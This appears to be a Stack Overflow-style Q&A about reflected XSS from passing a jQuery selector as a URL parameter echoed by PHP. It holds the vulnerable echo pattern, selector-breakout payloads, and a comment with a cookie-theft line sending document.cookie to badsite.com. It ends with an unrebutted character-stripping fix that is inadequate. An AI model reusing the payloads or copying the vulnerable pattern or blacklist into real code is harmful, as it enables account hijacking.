# Using jQuery Selectors Passed as URL Parameter - Safe?

Tags: javascript, php, jquery

I have the need to pass selectors to jquery using url parameters.

Like: page.php?sel=li.current,%23active,a[href=%27string%27]

Those are then echoed out by php like:

```
$('<?=$request[sel]?>').funct();
```

My questions are:

1) Is this a security risk?

2) If it is a risk as is, how can I safely do this?

The jquery code doesn't do much other than manipulate the css of elements defined by the selector.

Thank you

Comment: Safe for whom? Exactly what kind of threats are you trying to guard against?

Comment: Well it means i could make a public link to `page.php?sel=li.current');alert('youbeenhackedsukerz');$('g`

Comment: @user574632 - which would be annoying, but it's still just clientside and wouldn't really pose a security risk to the OP's server etc.

Comment: @adeneo sure **that example** is harmless, but it opens the door for all sorts. If a logged in user access via my link, i can gain access to their session data, change their password, all sorts. This code is bad

Comment: How exactly would you access the session or change their password with that access, it's basically the same access any user has from the console, are you saying you can access server sessions from the console, and if so, please tell me how ?

Comment: @adeneo  You, from the console, can grab your own session cookie, i, from my link, (if you follow it) can grab **your** session cookie

Comment: But the session cookie is useless, it's just a random ID, I would need server access to know what the session holds, and it's extremely hard to exploit something like this.

Comment: Yes, but with your session cookie, i can impersonate you on the website, then hijack your account. Do you see?

Comment: Yes, I see, but with most up to date webservers, that's harder to do than you think, and you'd have to start by somehow using the access you have to read that specific cookie and send the data somewhere, as right now all you have is access to a $_GET var that is inserted into jQuery, and going from there to reading and sending cookie data cross domain is not going to be that easy.

Comment: @adeneo `document.body.innerHTML+='<img src="http://badsite.com?p='+ document.cookie+'">';`

Comment: Thanks all for the input (and jokes) :) So from my take its okay to do as long as some checks are implemented. There shouldn't be any ') or ; in the selector values, so I suppose using php to strip those should be sufficient?

Answer (score 4):

No, it is not safe. It's vulnerable to an [XSS attack vector](https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)).

For example, for `sel=');alert('xssd')$('` an alert will show on the user's screen. This will allow attackers to execute arbitrary JavaScript. It can execute code to log them out or perform actions for them on their website, or show a prompt that asks them for their password for revalidation.

Comment: Or even worse, one could alert `Hello Kitty` and scare someone to death ?

Comment: @adeneo If it's a bank website it _could_ wire all your money to Hello Kitty :)

Comment: Pffft, I'm already giving all my money to Hello Kitty, so it doesn't matter.

Comment: I'm just going to do something like: `str_replace(array(';',' ','\')','$'),'',$sel);`